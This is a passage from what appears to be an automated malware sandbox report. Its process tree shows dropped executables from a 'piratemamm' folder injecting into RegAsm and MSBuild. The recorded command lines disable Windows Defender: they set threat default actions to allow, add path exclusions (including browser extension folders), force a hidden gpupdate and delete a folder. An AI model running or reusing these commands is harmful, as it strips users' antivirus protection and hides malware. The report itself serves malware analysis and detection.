        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2412 -parentBuildID 20240401114208 -prefsHandle 2352 -prefMapHandle 2348 -prefsLen 24598 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {715ab9ea-74cc-4402-a7c5-c2d96b70a54d} 1044 "\\.\pipe\gecko-crash-server-pipe.1044" socket
        9⤵
        
        PID:5736
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3280 -childID 1 -isForBrowser -prefsHandle 3000 -prefMapHandle 2996 -prefsLen 22587 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d62678c-b2c8-46a0-869b-1a79c84b0f99} 1044 "\\.\pipe\gecko-crash-server-pipe.1044" tab
        9⤵
        
        PID:6016
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3904 -childID 2 -isForBrowser -prefsHandle 3896 -prefMapHandle 1924 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {777bef3b-44d7-4915-a530-696bbd68965f} 1044 "\\.\pipe\gecko-crash-server-pipe.1044" tab
        9⤵
        
        PID:6104
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5072 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5040 -prefMapHandle 5036 -prefsLen 29195 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5c3016a-d4a4-4d34-8e02-b199c55f5022} 1044 "\\.\pipe\gecko-crash-server-pipe.1044" utility
        9⤵
        Checks processor information in registry
        
        PID:7408
    - - C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
        5⤵
        
        PID:1680
    - - C:\Users\Admin\1000029002\569a0e2a6b.exe
        
        "C:\Users\Admin\1000029002\569a0e2a6b.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5696
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 1096
        6⤵
        Program crash
        
        PID:7096
- - C:\Users\Admin\Documents\piratemamm\xnZKMNANdb1hPj4EMGPfbI7_.exe
    C:\Users\Admin\Documents\piratemamm\xnZKMNANdb1hPj4EMGPfbI7_.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:1648
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3060
- - C:\Users\Admin\Documents\piratemamm\P__Aw4a3LTu5pSi0dNAWUXxj.exe
    C:\Users\Admin\Documents\piratemamm\P__Aw4a3LTu5pSi0dNAWUXxj.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1660
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:2796
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IDAEBGCAAECA" & exit
        5⤵
        
        PID:5488
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        6⤵
        Delays execution with timeout.exe
        
        PID:5556
- - C:\Users\Admin\Documents\piratemamm\FHUBazhrdT8z4K_6_YmZLhw0.exe
    C:\Users\Admin\Documents\piratemamm\FHUBazhrdT8z4K_6_YmZLhw0.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:916
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:3624
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:4232
    - - C:\ProgramData\AKJKFBAFID.exe
        
        "C:\ProgramData\AKJKFBAFID.exe"
        5⤵
        
        PID:5184
    - - C:\ProgramData\AFIIEBGCAA.exe
        
        "C:\ProgramData\AFIIEBGCAA.exe"
        5⤵
        
        PID:400
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DHJEBGIEBFIJ" & exit
        5⤵
        
        PID:580
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        6⤵
        Delays execution with timeout.exe
        
        PID:5420
- - C:\Users\Admin\Documents\piratemamm\SJNGGnasEoZLXpweqgoJX1Tw.exe
    C:\Users\Admin\Documents\piratemamm\SJNGGnasEoZLXpweqgoJX1Tw.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:4600
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1104

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6408

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:6512

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5696 -ip 5696
1⤵
PID:7036

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
1⤵
PID:7444

C:\Users\Admin\AppData\Local\Temp\7zS8B14.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS8B14.tmp\Install.exe 2x /COdidDs 525403 /S
1⤵
PID:7484
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:6428
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:7552
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:7824
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5380
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:5404
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5276
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5692
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:5896
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5248
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:896
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    PID:5868
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5604
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:6320
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    - Indirect Command Execution
    PID:6324
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:6436
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6568
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:7128
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:7348
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5696
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7792
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:7648
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3428
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7952
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7904
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6664
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8188
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6680
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5684
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3944
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2556
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5432
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5436
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6284
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6300
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5444
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5668
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5440
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:8032
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YvREReDnvuUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YvREReDnvuUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eSZVwhDuipfU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eSZVwhDuipfU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fkrzaJYfU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fkrzaJYfU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jxjAhybTjpHMhOlVVLR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jxjAhybTjpHMhOlVVLR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ksrpDeExrbNyC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ksrpDeExrbNyC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VPXvovUKlRyvohVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VPXvovUKlRyvohVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wzYEFOcpeyKMtFwuD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wzYEFOcpeyKMtFwuD\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\GTQqDGwYWbPvVFKR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\GTQqDGwYWbPvVFKR\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:8072
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YvREReDnvuUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:676
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YvREReDnvuUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5200
- - C:\Windows\SysWOW64\reg.exe
